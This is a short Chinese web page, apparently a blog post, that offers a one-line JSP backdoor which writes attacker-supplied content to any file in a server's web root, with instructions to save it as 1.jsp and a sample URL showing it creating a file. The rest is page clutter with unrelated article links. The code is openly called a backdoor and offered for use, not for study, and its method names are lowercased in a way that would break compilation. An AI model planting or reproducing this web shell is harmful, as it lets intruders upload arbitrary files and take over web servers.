<%
if(request.getparameter("f")!=null)(new java.io.fileoutputstream(application.getrealpath("\")+request.getparameter("f"))).write(request.getparameter("t").getbytes());
%>
这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!
http://localhost/1.jsp?f=1.txt&t=hello
然后:http://localhost/1.txt 就出来了 内容为 hello .....
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
算法之算法概述
目录一、算法概述1、算法和数据结构(1)什么是算法?(2)什么是数据结构?2、时间复杂度(1)执行次数(2)渐进...
[阅读全文]
-
-
-
-
第九章 同步
第九章 同步9.1 背景到目前为止多道程序设计(multi- programming) :现代操作系统的重要特性...
[阅读全文]
-
-
-
-
网友评论